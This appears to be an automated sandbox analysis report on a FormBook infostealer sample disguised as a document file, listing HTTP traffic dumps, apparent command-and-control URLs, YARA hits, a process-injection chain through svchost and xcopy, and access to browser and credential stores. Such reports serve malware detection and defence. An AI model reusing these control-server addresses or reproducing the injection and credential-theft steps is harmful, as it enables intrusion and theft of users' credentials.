10 1d 29 e3 a1 f1 aa 3d 18 e0 b8 bd 19 45 99 00 1f a1 11 96 94 e5 f6 25 4d c9 3b 80 af 04 d5 ab e1 30 6a 79 f1 26 a2 12 c2 8e 1e 02 c3 3f e5 ec 07 fd 23 db 46 7f 63 2c 49 09 ba c4 09 fa 88 73 9c 10 8e 6c fb e2 10 21 84 fa 22 e2 b4 90 17 8d e1 38 8f 80 7f 63 62 c5 96 b0 52 8b 9a b3 c9 d7 f4 5b 08 3f fe fc f3 eb b7 1e fc e1 14 63 31 6a cc 4e 12 99 39 42 62 2e 4f ba 8a 4c 4e 26 e8 27 2c 49 c3 74 12 22 2f 69 46 1a a6 45 ee 48 2e bb 0a f6 46 9c cc cd de 1d e6 68 18 c6 00 f2 3e 25 19 c9 a5 78 3b bd c4 c9 af 38 23 0d 61 7e f5 be 59 8a da 4d 18 3b 11 27 58 92 12 ac 21 4c 2b 4e c3 f4 28 3c 89 b1 c4 bf e0 29 e1 27 6f 4e 8e d3 f0 e4 75 da 3d 39 e9 dd 38 58 4c f3 28 94 7c 4c 7a 37 8e e0 51 a8 28 9d 2c b2 c2 64 32 71 12 65 06 89 93 4c 1b c1 89 58 e6 6a e9 de d0 38 3c 79 4d 5f c7 69 6f e8 14 98 93 5c fe ca 62 e2 d0 5c 10 2e df 92 21 e3 a4 71 63 0d cd 9e 22 3b 37 1b 13 9a c7 6c 62 c5 2c 1a 83 84 d6 89 36 e4 89 55 91 d0 3a f9 db e5 47 fb e3 bf fe db e9 d9 df 4f Data Ascii: 16e1<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 05:46:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8e2cf17cf9252cd4-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 36 65 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 7d 33 78 11 51 ca df b6 a2 f8 dd 72 f8 9d 7b bf f3 a2 72 28 8a 35 72 64 38 a7 43 22 e4 8b 30 13 54 12 67 42 06 4b a2 9b bc c4 6d 39 f8 2f c1 0c 0f 31 a7 76 41 f3 9c c4 b6 c4 03 47 dc 25 10 1d 29 e3 a1 f1 aa 3d 18 e0 b8 bd 19 45 99 00 1f a1 11 96 94 e5 f6 25 4d c9 3b 80 af 04 d5 ab e1 30 6a 79 f1 26 a2 12 c2 8e 1e 02 c3 3f e5 ec 07 fd 23 db 46 7f 63 2c 49 09 ba c4 09 fa 88 73 9c 10 8e 6c fb e2 10 21 84 fa 22 e2 b4 90 17 8d e1 38 8f 80 7f 63 62 c5 96 b0 52 8b 9a b3 c9 d7 f4 5b 08 3f fe fc f3 eb b7 1e fc e1 14 63 31 6a cc 4e 12 99 39 42 62 2e 4f ba 8a 4c 4e 26 e8 27 2c 49 c3 74 12 22 2f 69 46 1a a6 45 ee 48 2e bb 0a f6 46 9c cc cd de 1d e6 68 18 c6 00 f2 3e 25 19 c9 a5 78 3b bd c4 c9 af 38 23 0d 61 7e f5 be 59 8a da 4d 18 3b 11 27 58 92 12 ac 21 4c 2b 4e c3 f4 28 3c 89 b1 c4 bf e0 29 e1 27 6f 4e 8e d3 f0 e4 75 da 3d 39 e9 dd 38 58 4c f3 28 94 7c 4c 7a 37 8e e0 51 a8 28 9d 2c b2 c2 64 32 71 12 65 06 89 93 4c 1b c1 89 58 e6 6a e9 de d0 38 3c 79 4d 5f c7 69 6f e8 14 98 93 5c fe ca 62 e2 d0 5c 10 2e df 92 21 e3 a4 71 63 0d cd 9e 22 3b 37 1b 13 9a c7 6c 62 c5 2c 1a 83 84 d6 89 36 e4 89 55 91 d0 3a f9 db e5 47 fb e3 bf fe db e9 d9 df 4f Data Ascii: 16eb<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 05:46:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8e2cf18d1b14e5b1-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 36 65 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 7d 33 78 11 51 ca df b6 a2 f8 dd 72 f8 9d 7b bf f3 a2 72 28 8a 35 72 64 38 a7 43 22 e4 8b 30 13 54 12 67 42 06 4b a2 9b bc c4 6d 39 f8 2f c1 0c 0f 31 a7 76 41 f3 9c c4 b6 c4 03 47 dc 25 10 1d 29 e3 a1 f1 aa 3d 18 e0 b8 bd 19 45 99 00 1f a1 11 96 94 e5 f6 25 4d c9 3b 80 af 04 d5 ab e1 30 6a 79 f1 26 a2 12 c2 8e 1e 02 c3 3f e5 ec 07 fd 23 db 46 7f 63 2c 49 09 ba c4 09 fa 88 73 9c 10 8e 6c fb e2 10 21 84 fa 22 e2 b4 90 17 8d e1 38 8f 80 7f 63 62 c5 96 b0 52 8b 9a b3 c9 d7 f4 5b 08 3f fe fc f3 eb b7 1e fc e1 14 63 31 6a cc 4e 12 99 39 42 62 2e 4f ba 8a 4c 4e 26 e8 27 2c 49 c3 74 12 22 2f 69 46 1a a6 45 ee 48 2e bb 0a f6 46 9c cc cd de 1d e6 68 18 c6 00 f2 3e 25 19 c9 a5 78 3b bd c4 c9 af 38 23 0d 61 7e f5 be 59 8a da 4d 18 3b 11 27 58 92 12 ac 21 4c 2b 4e c3 f4 28 3c 89 b1 c4 bf e0 29 e1 27 6f 4e 8e d3 f0 e4 75 da 3d 39 e9 dd 38 58 4c f3 28 94 7c 4c 7a 37 8e e0 51 a8 28 9d 2c b2 c2 64 32 71 12 65 06 89 93 4c 1b c1 89 58 e6 6a e9 de d0 38 3c 79 4d 5f c7 69 6f e8 14 98 93 5c fe ca 62 e2 d0 5c 10 2e df 92 21 e3 a4 71 63 0d cd 9e 22 3b 37 1b 13 9a c7 6c 62 c5 2c 1a 83 84 d6 89 36 e4 89 55 91 d0 3a f9 db e5 47 fb e3 bf fe db e9 d9 df 4f Data Ascii: 16eb<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G
            Source: xcopy.exe, 00000004.00000002.617342732.00000000031EC000.00000004.10000000.00040000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000005.00000002.617027194.00000000038EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://estrela-b.online/62tt/?WrGp=yRUDttthc40H6jfP&5RH=2eR3StT9zNfU5ywXH4HggrTvpCnGbiZlVhDhLCkeE
            Source: xcopy.exe, 00000004.00000002.617342732.000000000337E000.00000004.10000000.00040000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000005.00000002.617027194.0000000003A7E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://meanttobebroken.org/zdt7/?5RH=OdyTsfpKOp
            Source: CuJYYyjxRgkNEt.exe, 00000005.00000002.616917024.0000000000937000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mjmegartravel.online
            Source: CuJYYyjxRgkNEt.exe, 00000005.00000002.616917024.0000000000937000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mjmegartravel.online/t2sm/
            Source: xcopy.exe, 00000004.00000002.617737961.0000000061EB5000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drString found in binary or memory: http://www.sqlite.org/copyright.html.
            Source: xcopy.exe, 00000004.00000003.440762391.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, 56Q8T4H.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: xcopy.exe, 00000004.00000003.440762391.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, 56Q8T4H.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: xcopy.exe, 00000004.00000003.440762391.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, 56Q8T4H.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: xcopy.exe, 00000004.00000003.440762391.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, 56Q8T4H.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: xcopy.exe, 00000004.00000003.440762391.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, 56Q8T4H.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: xcopy.exe, 00000004.00000002.617342732.0000000002EC8000.00000004.10000000.00040000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000005.00000002.617027194.00000000035C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Poppins:400
            Source: xcopy.exe, 00000004.00000003.440762391.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, 56Q8T4H.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: xcopy.exe, 00000004.00000003.440762391.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, 56Q8T4H.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: 56Q8T4H.4.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: xcopy.exe, 00000004.00000002.617342732.0000000002D36000.00000004.10000000.00040000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000005.00000002.617027194.0000000003436000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.shintow.net/ow7i/?5RH=D6NwXqVIZVbqudPYhFuxSgI6F25/rGDj7EaXwER037qfX6kPuWmDPuQzRSnaZsITlU

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000005.00000002.616917024.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.396307555.00000000002B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.616838058.0000000000160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.396316461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.616820930.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.616853860.00000000002B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.452537297.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.616973792.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.396448093.00000000019D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Binary is likely a compiled AutoIt script file
            Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000000.348940313.000000000040E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_936dc4f6-d
            Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000000.348940313.000000000040E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: 9SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c0d97b46-9
            Source: RN# D7521-RN-00353 REV-2.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e5510fa0-1
            Source: RN# D7521-RN-00353 REV-2.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0de5c801-8
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: sqlite3.dll.4.drStatic PE information: Number of sections : 18 > 10
            Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000003.350686083.0000000002D90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RN# D7521-RN-00353 REV-2.exe
            Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000003.351128311.0000000002B2D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RN# D7521-RN-00353 REV-2.exe
            Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.352868331.0000000001100000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs RN# D7521-RN-00353 REV-2.exe
            Source: C:\Windows\SysWOW64\xcopy.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@7/7@8/8
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeFile created: C:\Users\user\AppData\Local\Temp\aut539C.tmpJump to behavior
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\xcopy.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: xcopy.exe, 00000004.00000002.617722014.0000000061E9B000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: xcopy.exe, 00000004.00000002.617722014.0000000061E9B000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: xcopy.exe, 00000004.00000002.617722014.0000000061E9B000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: xcopy.exe, 00000004.00000002.617722014.0000000061E9B000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: xcopy.exe, 00000004.00000002.617722014.0000000061E9B000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: xcopy.exe, 00000004.00000002.617722014.0000000061E9B000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: xcopy.exe, 00000004.00000002.617722014.0000000061E9B000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: RN# D7521-RN-00353 REV-2.exeReversingLabs: Detection: 56%
            Source: unknownProcess created: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe"
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe"
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
            Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe"Jump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: mozglue.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: riched32.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exeSection loaded: rasadhlp.dllJump to behavior
